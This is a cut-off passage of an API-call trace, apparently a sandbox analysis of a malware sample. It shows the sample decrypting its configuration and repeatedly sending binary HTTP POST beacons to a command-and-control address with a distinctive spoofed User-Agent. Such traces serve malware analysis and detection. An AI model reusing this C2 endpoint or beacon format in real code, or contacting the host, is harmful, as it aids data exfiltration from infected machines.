[0236.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0236.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.311] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0236.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.313] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0236.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.314] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0236.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.315] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0236.315] GetProcessHeap () returned 0x6a0000 [0236.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0236.315] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0236.316] GetProcessHeap () returned 0x6a0000 [0236.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0236.316] GetProcessHeap () returned 0x6a0000 [0236.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0236.316] GetProcessHeap () returned 0x6a0000 [0236.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0236.317] GetProcessHeap () returned 0x6a0000 [0236.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0236.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.321] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.327] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0236.337] GetProcessHeap () returned 0x6a0000 [0236.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0236.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.338] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0236.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.342] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0236.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.343] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.344] GetProcessHeap () returned 0x6a0000 [0236.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0236.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.345] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0236.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.346] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0236.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.347] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0236.347] GetProcessHeap () returned 0x6a0000 [0236.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0236.347] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.348] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0236.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.349] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0236.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.350] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0236.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.351] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0236.351] GetProcessHeap () returned 0x6a0000 [0236.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0236.351] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0236.351] GetProcessHeap () returned 0x6a0000 [0236.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0236.351] socket (af=2, type=1, protocol=6) returned 0x764 [0236.351] connect (s=0x764, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0236.378] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0236.378] GetProcessHeap () returned 0x6a0000 [0236.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0236.378] GetProcessHeap () returned 0x6a0000 [0236.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9f18 [0236.380] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0236.383] wvsprintfA (in: param_1=0x6d9f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0236.383] GetProcessHeap () returned 0x6a0000 [0236.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4af8 [0236.383] GetProcessHeap () returned 0x6a0000 [0236.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 [0236.385] GetProcessHeap () returned 0x6a0000 [0236.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0236.385] GetProcessHeap () returned 0x6a0000 [0236.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9f18 [0236.385] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0236.386] wvsprintfA (in: param_1=0x6d9f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0236.386] GetProcessHeap () returned 0x6a0000 [0236.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0236.386] GetProcessHeap () returned 0x6a0000 [0236.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 [0236.387] send (s=0x764, buf=0x6bd460*, len=242, flags=0) returned 242 [0236.387] send (s=0x764, buf=0x6bb998*, len=159, flags=0) returned 159 [0236.387] GetProcessHeap () returned 0x6a0000 [0236.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9f18 [0236.388] recv (in: s=0x764, buf=0x6d9f18, len=4048, flags=0 | out: buf=0x6d9f18*) returned 204 [0236.471] GetProcessHeap () returned 0x6a0000 [0236.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0236.472] GetProcessHeap () returned 0x6a0000 [0236.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0236.472] GetProcessHeap () returned 0x6a0000 [0236.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4af8 | out: hHeap=0x6a0000) returned 1 [0236.473] GetProcessHeap () returned 0x6a0000 [0236.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0236.474] closesocket (s=0x764) returned 0 [0236.475] GetProcessHeap () returned 0x6a0000 [0236.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0236.475] GetProcessHeap () returned 0x6a0000 [0236.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0236.475] GetProcessHeap () returned 0x6a0000 [0236.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0236.476] GetProcessHeap () returned 0x6a0000 [0236.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0236.476] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1498) returned 0x764 [0236.480] Sleep (dwMilliseconds=0xea60) [0236.482] GetProcessHeap () returned 0x6a0000 [0236.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0236.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.483] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.488] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0236.494] GetProcessHeap () returned 0x6a0000 [0236.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0236.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.496] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0236.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.497] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0236.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.498] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.498] GetProcessHeap () returned 0x6a0000 [0236.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0236.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.502] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0236.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.503] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0236.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.504] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0236.504] GetProcessHeap () returned 0x6a0000 [0236.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0236.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.505] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0236.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.507] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0236.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.507] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0236.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.508] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0236.509] GetProcessHeap () returned 0x6a0000 [0236.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0236.509] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0236.509] GetProcessHeap () returned 0x6a0000 [0236.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0236.515] GetProcessHeap () returned 0x6a0000 [0236.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0236.515] GetProcessHeap () returned 0x6a0000 [0236.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0236.515] GetProcessHeap () returned 0x6a0000 [0236.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0236.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.516] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.525] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0236.532] GetProcessHeap () returned 0x6a0000 [0236.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0236.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.533] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0236.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.534] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0236.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.535] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.535] GetProcessHeap () returned 0x6a0000 [0236.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0236.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.536] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0236.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.537] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0236.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.538] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0236.539] GetProcessHeap () returned 0x6a0000 [0236.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0236.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.540] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0236.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.541] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0236.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.542] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0236.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.542] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0236.543] GetProcessHeap () returned 0x6a0000 [0236.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0236.543] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0236.543] GetProcessHeap () returned 0x6a0000 [0236.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0236.543] socket (af=2, type=1, protocol=6) returned 0x768 [0236.543] connect (s=0x768, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0236.570] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0236.570] GetProcessHeap () returned 0x6a0000 [0236.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0236.570] GetProcessHeap () returned 0x6a0000 [0236.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9f18 [0236.571] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0236.572] wvsprintfA (in: param_1=0x6d9f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0236.572] GetProcessHeap () returned 0x6a0000 [0236.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4738 [0236.572] GetProcessHeap () returned 0x6a0000 [0236.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 [0236.573] GetProcessHeap () returned 0x6a0000 [0236.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0236.573] GetProcessHeap () returned 0x6a0000 [0236.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9f18 [0236.573] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0236.574] wvsprintfA (in: param_1=0x6d9f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0236.574] GetProcessHeap () returned 0x6a0000 [0236.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0236.574] GetProcessHeap () returned 0x6a0000 [0236.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 [0236.575] send (s=0x768, buf=0x6bd460*, len=242, flags=0) returned 242 [0236.575] send (s=0x768, buf=0x6bb998*, len=159, flags=0) returned 159 [0236.576] GetProcessHeap () returned 0x6a0000 [0236.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9f18 [0236.576] recv (in: s=0x768, buf=0x6d9f18, len=4048, flags=0 | out: buf=0x6d9f18*) returned 204 [0236.648] GetProcessHeap () returned 0x6a0000 [0236.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0236.649] GetProcessHeap () returned 0x6a0000 [0236.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0236.649] GetProcessHeap () returned 0x6a0000 [0236.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4738 | out: hHeap=0x6a0000) returned 1 [0236.649] GetProcessHeap () returned 0x6a0000 [0236.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0236.650] closesocket (s=0x768) returned 0 [0236.650] GetProcessHeap () returned 0x6a0000 [0236.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0236.650] GetProcessHeap () returned 0x6a0000 [0236.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0236.651] GetProcessHeap () returned 0x6a0000 [0236.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0236.651] GetProcessHeap () returned 0x6a0000 [0236.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0236.652] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x149c) returned 0x768 [0236.653] Sleep (dwMilliseconds=0xea60) [0236.655] GetProcessHeap () returned 0x6a0000 [0236.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0236.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.656] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.662] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0236.670] GetProcessHeap () returned 0x6a0000 [0236.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0236.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.671] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0236.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.672] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0236.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.673] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.673] GetProcessHeap () returned 0x6a0000 [0236.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0236.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.675] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0236.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.678] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0236.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.679] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0236.679] GetProcessHeap () returned 0x6a0000 [0236.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0236.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.681] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0236.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.682] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0236.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.683] StrStrA 